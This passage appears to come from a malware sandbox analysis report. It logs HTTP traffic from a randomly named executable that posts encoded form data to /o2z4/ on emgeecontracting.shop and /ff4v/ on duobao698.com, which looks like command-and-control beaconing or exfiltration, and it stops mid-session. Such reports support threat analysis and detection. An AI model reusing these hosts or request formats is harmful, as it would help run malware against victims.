                                  Data Raw: 34 68 3d 6c 36 7a 4e 63 73 37 76 67 41 5a 48 70 4b 54 4f 32 4e 55 54 62 4c 57 51 45 2b 31 4b 33 37 37 74 42 39 51 35 4e 6d 6c 65 70 5a 6a 4a 75 51 55 52 2b 59 5a 39 67 50 42 32 47 67 63 75 35 42 33 4c 52 6b 4a 36 70 64 47 49 57 54 42 5a 56 74 6b 51 53 61 7a 68 59 32 6b 51 74 39 67 78 68 72 5a 42 59 44 77 59 6c 34 32 54 35 49 6a 33 65 48 50 4c 50 68 53 39 66 34 44 6c 63 33 64 6f 48 44 77 33 47 64 62 36 72 36 63 62 66 64 38 4c 56 63 76 36 4d 48 32 37 34 33 31 5a 69 31 78 79 62 44 36 67 4b 30 64 4b 51 35 42 4c 2b 79 6e 39 35 50 7a 32 76 75 69 4a 55 42 43 69 59 6c 66 36 75 4e 6e 52 53 57 68 4e 4e 7a 6a 50 47 37 33 6e 39 57 35 79 72 51 3d 3d
                                  Data Ascii: 4h=l6zNcs7vgAZHpKTO2NUTbLWQE+1K377tB9Q5NmlepZjJuQUR+YZ9gPB2Ggcu5B3LRkJ6pdGIWTBZVtkQSazhY2kQt9gxhrZBYDwYl42T5Ij3eHPLPhS9f4Dlc3doHDw3Gdb6r6cbfd8LVcv6MH27431Zi1xybD6gK0dKQ5BL+yn95Pz2vuiJUBCiYlf6uNnRSWhNNzjPG73n9W5yrQ==
                                  May 27, 2024 12:34:51.423408031 CEST1236INHTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:34:51 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:34:51.423427105 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.74972169.57.162.24806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:54.819845915 CEST795OUTPOST /o2z4/ HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.emgeecontracting.shop
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.emgeecontracting.shop/o2z4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 6c 36 7a 4e 63 73 37 76 67 41 5a 48 71 70 4c 4f 30 75 4d 54 4d 37 57 50 4c 65 31 4b 69 72 37 70 42 39 4d 35 4e 6e 67 62 6f 72 48 4a 76 78 49 52 2f 5a 5a 39 6c 50 42 32 65 51 63 72 6b 78 33 2b 52 6b 31 79 70 64 36 49 57 53 6c 5a 56 6f 59 51 53 70 72 69 5a 6d 6b 65 68 64 67 2f 75 4c 5a 42 59 44 77 59 6c 34 79 31 35 49 37 33 65 30 58 4c 4f 44 32 36 56 59 44 6d 4d 6e 64 6f 57 7a 77 7a 47 64 61 58 72 34 6f 31 66 65 49 4c 56 63 66 36 64 7a 61 30 79 33 31 62 6d 31 77 5a 4b 78 76 65 4d 78 31 48 5a 49 42 4d 34 44 2f 6b 31 5a 75 55 31 4d 75 6c 4b 51 36 5a 63 6e 37 4d 35 72 36 6b 51 58 6c 56 41 52 58 75 5a 4d 53 4e 77 45 59 32 39 75 4a 44 45 46 48 2b 33 77 4e 31 6a 70 57 4e 52 2b 63 34 38 41 41 3d
                                  Data Ascii: 4h=l6zNcs7vgAZHqpLO0uMTM7WPLe1Kir7pB9M5NngborHJvxIR/ZZ9lPB2eQcrkx3+Rk1ypd6IWSlZVoYQSpriZmkehdg/uLZBYDwYl4y15I73e0XLOD26VYDmMndoWzwzGdaXr4o1feILVcf6dza0y31bm1wZKxveMx1HZIBM4D/k1ZuU1MulKQ6Zcn7M5r6kQXlVARXuZMSNwEY29uJDEFH+3wN1jpWNR+c48AA=
                                  May 27, 2024 12:34:55.562805891 CEST1236INHTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:34:55 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:34:55.562830925 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.74972269.57.162.24806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:57.350589037 CEST1808OUTPOST /o2z4/ HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.emgeecontracting.shop
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.emgeecontracting.shop/o2z4/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 6c 36 7a 4e 63 73 37 76 67 41 5a 48 71 70 4c 4f 30 75 4d 54 4d 37 57 50 4c 65 31 4b 69 72 37 70 42 39 4d 35 4e 6e 67 62 6f 72 50 4a 75 44 41 52 2b 37 78 39 6d 50 42 32 41 67 63 71 6b 78 33 6e 52 67 5a 4d 70 64 32 59 57 51 74 5a 57 4b 67 51 55 63 66 69 41 57 6b 65 76 4e 67 79 68 72 5a 51 59 43 41 63 6c 34 69 31 35 49 37 33 65 31 6e 4c 48 78 53 36 54 59 44 6c 63 33 64 30 48 44 77 62 47 64 43 70 72 34 73 4c 66 49 34 4c 62 59 37 36 4f 6d 32 30 76 6e 31 64 71 56 77 42 4b 78 7a 37 4d 33 51 32 5a 49 6c 69 34 42 2f 6b 33 2b 44 54 74 59 76 6a 4a 32 2b 44 63 6b 76 38 2b 4e 79 71 58 57 5a 69 46 42 54 35 45 63 79 6f 78 6b 55 34 37 59 63 67 55 30 7a 75 35 42 31 33 75 74 76 49 4a 4c 41 62 6f 77 42 59 67 52 6e 65 58 6b 48 70 67 48 79 4c 5a 45 2f 66 61 34 58 64 31 6f 6a 32 44 5a 6a 72 32 46 71 39 72 45 41 57 67 57 44 45 46 68 53 62 53 6b 55 6a 45 69 79 4d 79 6f 4b 6f 54 72 51 58 70 30 31 56 51 6d 48 4e 43 55 33 58 76 30 6c 43 4e 30 42 4c 71 30 75 79 61 65 2f 65 53 79 54 6e 61 46 54 74 42 73 36 54 45 79 36 [TRUNCATED]
                                  Data Ascii: 4h=l6zNcs7vgAZHqpLO0uMTM7WPLe1Kir7pB9M5NngborPJuDAR+7x9mPB2Agcqkx3nRgZMpd2YWQtZWKgQUcfiAWkevNgyhrZQYCAcl4i15I73e1nLHxS6TYDlc3d0HDwbGdCpr4sLfI4LbY76Om20vn1dqVwBKxz7M3Q2ZIli4B/k3+DTtYvjJ2+Dckv8+NyqXWZiFBT5EcyoxkU47YcgU0zu5B13utvIJLAbowBYgRneXkHpgHyLZE/fa4Xd1oj2DZjr2Fq9rEAWgWDEFhSbSkUjEiyMyoKoTrQXp01VQmHNCU3Xv0lCN0BLq0uyae/eSyTnaFTtBs6TEy6WRzr+7HRdT4rUSqhm48tjpNYLTCmISo8PTertQSV0KqpFcOb7IREs3zJl2DgFW7/CGkftoaX+DZTBPe1vmT5c1ntLLNTsk6jjAUfU3vtGWH87n4j4Ok3WPBNkKcabNOLhjJvG8ZN0Y5MX6JTn9Bb/k6eISCul8nhJHBbpFBCYR54Fqnd6hkw4ZVKwQ1k58p3mjApda2YDWa0T6eW9KHwUe3fWkFbiVZyIID0hckBOjne73JiMDF4VrcRNVnFuXFzy62oocZpZGli6FCxwhZOi2z/g/FkxGuUHVSx7OYOzEmsKJ2TVLfZw3i+2ighCSG/tDX7U0yxQUuknmuqNvgqT0ulumFeyrvfGrvcpe3/BwKXLa4usIAtqo0lIBuN+iKs3+/pAYxt/pSUSe8dIeEYBcs6k8rannHC9H/9+os589HJr/wE/Sav0W2EOTcGM+GrnLZXkoFRUzoVkjgclX0P0mRa5JnXWvbuoYX/aT5sWAK1p/F2LiPxVF7gnsViuxt5XJuw4UtwtNHRE4FSlkTY1fC5Pok6JReJ1GY8C9E1p26JOsxZ9DUnyGMjxDTg8KCSIAKTztVxHaavC4S+kvHLCd/yGkG4RU6S86g4/BPOcbtQY4/tL7lZ1DAxU7j+g+D6kiAQMr+nE22nVX2E4VxVUJsvWwD48WJHao [TRUNCATED]
                                  May 27, 2024 12:34:58.046570063 CEST1236INHTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:34:57 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:34:58.046595097 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.74972369.57.162.24806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:34:59.883483887 CEST496OUTGET /o2z4/?4h=o4btfdz60D114qnlpPkAL4ysHPNnnpnlNvMaE18djeqdyh8JxI4to+dkcTQv5jDwTFNUiMSIZUwmUqoSbZzkAVBLptEej4dkSw0Rp5qMw46dSxiTGxGYdrzYQnQsEiM3dvL1u5YQIt8O&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.emgeecontracting.shop
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:00.474288940 CEST1236INHTTP/1.1 404 Not Found
                                  keep-alive: timeout=5, max=100
                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                  pragma: no-cache
                                  content-type: text/html
                                  content-length: 1251
                                  date: Mon, 27 May 2024 10:35:00 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                  connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                  May 27, 2024 12:35:00.474312067 CEST316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                  Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.7497243.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:05.507235050 CEST751OUTPOST /ff4v/ HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.duobao698.com
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.duobao698.com/ff4v/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 47 58 33 6e 38 37 7a 55 75 30 58 68 6f 30 6e 6c 7a 72 57 38 49 72 49 49 41 43 37 46 48 57 55 64 6d 68 62 6a 4d 50 6e 76 45 75 34 61 4a 2b 35 39 73 2f 67 6a 41 78 2b 4e 72 7a 5a 79 38 51 69 48 67 75 58 68 57 48 44 61 71 48 52 79 50 39 77 43 58 54 55 48 43 72 4f 53 4b 67 45 34 4b 6c 72 59 51 2b 72 68 73 31 43 6b 65 43 4d 5a 56 55 36 57 62 57 63 61 74 61 49 31 30 32 6e 49 47 79 65 62 67 36 79 57 4c 4f 68 4e 69 31 6d 6b 41 72 30 34 70 4c 5a 46 65 56 6c 78 55 47 2f 77 69 75 4f 35 71 73 79 5a 53 65 55 77 48 67 74 35 59 35 30 4f 47 31 6b 46 70 31 56 63 4f 52 31 70 78 69 63 4f 38 39 37 31 66 76 72 74 6e 41 61 77 47 62 39 4a 38 67 3d 3d
                                  Data Ascii: 4h=GX3n87zUu0Xho0nlzrW8IrIIAC7FHWUdmhbjMPnvEu4aJ+59s/gjAx+NrzZy8QiHguXhWHDaqHRyP9wCXTUHCrOSKgE4KlrYQ+rhs1CkeCMZVU6WbWcataI102nIGyebg6yWLOhNi1mkAr04pLZFeVlxUG/wiuO5qsyZSeUwHgt5Y50OG1kFp1VcOR1pxicO8971fvrtnAawGb9J8g==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.7497253.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:08.039880037 CEST771OUTPOST /ff4v/ HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.duobao698.com
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.duobao698.com/ff4v/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Raw: 34 68 3d 47 58 33 6e 38 37 7a 55 75 30 58 68 70 55 37 6c 32 49 2b 38 4b 4c 49 4a 4e 53 37 46 4a 32 55 52 6d 68 58 6a 4d 4f 53 79 45 59 67 61 4a 66 4a 39 74 36 63 6a 48 78 2b 4e 6a 54 5a 37 34 51 69 36 67 75 4b 63 57 48 2f 61 71 48 46 79 50 2f 34 43 58 41 38 45 45 72 4f 63 4d 67 45 36 41 46 72 59 51 2b 72 68 73 31 47 43 65 43 30 5a 55 67 2b 57 61 33 63 64 6b 36 49 30 2b 57 6e 49 43 79 66 53 67 36 7a 7a 4c 4d 45 51 69 7a 69 6b 41 75 51 34 70 61 5a 47 45 46 6c 33 4b 32 2b 45 68 73 6a 6c 67 4f 72 6e 57 38 63 65 4f 51 4e 2f 64 50 70 73 63 58 6f 70 33 6b 74 6e 4b 54 52 66 6d 45 42 37 2b 38 2f 74 53 4e 66 4d 34 33 2f 61 4c 4a 63 4e 71 64 39 6f 39 32 78 77 69 33 63 49 33 4f 42 56 45 77 58 43 62 34 59 3d
                                  Data Ascii: 4h=GX3n87zUu0XhpU7l2I+8KLIJNS7FJ2URmhXjMOSyEYgaJfJ9t6cjHx+NjTZ74Qi6guKcWH/aqHFyP/4CXA8EErOcMgE6AFrYQ+rhs1GCeC0ZUg+Wa3cdk6I0+WnICyfSg6zzLMEQizikAuQ4paZGEFl3K2+EhsjlgOrnW8ceOQN/dPpscXop3ktnKTRfmEB7+8/tSNfM43/aLJcNqd9o92xwi3cI3OBVEwXCb4Y=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.7497263.33.130.190806704C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  TimestampBytes transferredDirectionData
                                  May 27, 2024 12:35:10.588650942 CEST1784OUTPOST /ff4v/ HTTP/1.1
                                  Host: www.duobao698.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.duobao698.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.duobao698.com/ff4v/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
